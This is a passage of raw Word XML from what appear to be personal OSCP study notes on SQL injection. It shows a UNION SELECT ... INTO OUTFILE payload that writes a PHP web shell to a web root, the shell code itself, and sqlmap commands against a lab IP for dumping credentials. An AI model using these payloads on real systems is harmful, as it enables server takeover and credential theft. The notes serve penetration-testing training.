      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT "&lt;?php system($_GET['cmd']);?&gt;", null, null, null, null INTO OUTFILE "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/tmp/webshell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="556"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 30 - Write a WebShell To Disk via INTO OUTFILE directive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017E9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The written PHP code file results in the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017EA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;? system($_REQUEST['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1458"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 31 - PHP web shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017EC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The PHP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function will parse any statement included in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cmd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter coming from the client HTTP REQUEST, thus acting like a web-interactive command shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017ED">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If we try to use the above payload inside the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lookup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> field of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint, we receive the following error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017EE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2451100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 17: Writing the WebShell to Disk" id="424" name="image430.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 17: Writing the WebShell to Disk" id="0" name="image430.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId494"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2451100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 17: Writing the WebShell to Disk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017EF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fortunately, this error is related to the incorrect return type and should not impact writing the webshell on disk.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To confirm, we can access the newly created webshell inside the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tmp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder along with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="977900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr descr="Figure 18: Accessing the Webshell" id="538" name="image534.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 18: Accessing the Webshell" id="0" name="image534.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId495"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="977900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln w="25400">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 18: Accessing the Webshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F2">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Great! The webshell is working as expected since the output of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command is returned to us through the web browser. We discovered that we are executing commands as the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">www-data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, an identity commonly associated with web servers on Linux systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F3">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that we understand how to leverage SQLi to manually obtain command execution, let's discover how to automate the process with specific tools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017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F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_bxpantnvkdfa" w:id="199"/>
      <w:bookmarkEnd w:id="199"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Automated Code Execution (SQL Map) (SQL Injections)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017F9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017FA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More SQLmap practice can be found in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId496">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Butch</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1045"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dumping databases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017FD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017FE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP (10.3.2 Automating the Attack)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000017FF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001800">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This following example does everything that the previous section (Manual Code Execution) did, but it's now automated with SQLMap. I wanted to include this since it's a nice illustration of what exactly SQLMap does, since we can always reference our manual commands from the previous section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001801">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001802">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The SQL injection process we followed can be automated using several tools pre-installed on Kali Linux. In particular,</w:t>
      </w:r>
      <w:hyperlink r:id="rId497">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId498">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">sqlmap</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> can identify and exploit SQL injection vulnerabilities against various database engines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001803">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on our sample web application. We will set the URL we want to scan with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and specify the parameter to test using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001804">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001805">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5588000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="106" name="image104.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image104.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49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1806">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="957"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001807">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001808">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We submitted the entire URL after the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> specifier together with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter set to a dummy value. Once launched, we can press I on the default options. Sqlmap then returns a confirmation that we are dealing with a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">time-based blind</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL injection and provides additional fingerprinting information such as the web server operating system, web application technology stack, and the backend database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001809">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although the above command confirmed that the target URL is vulnerable to SQLi, we can extend our tradecraft by using sqlmap to dump the database table and steal user credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000180A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although sqlmap is a great tool to automate SQLi attacks, it provides next-to-zero stealth. Due to its high volume of traffic, sqlmap should not be used as a first-choice tool during assignments that require staying under the radar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000180B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
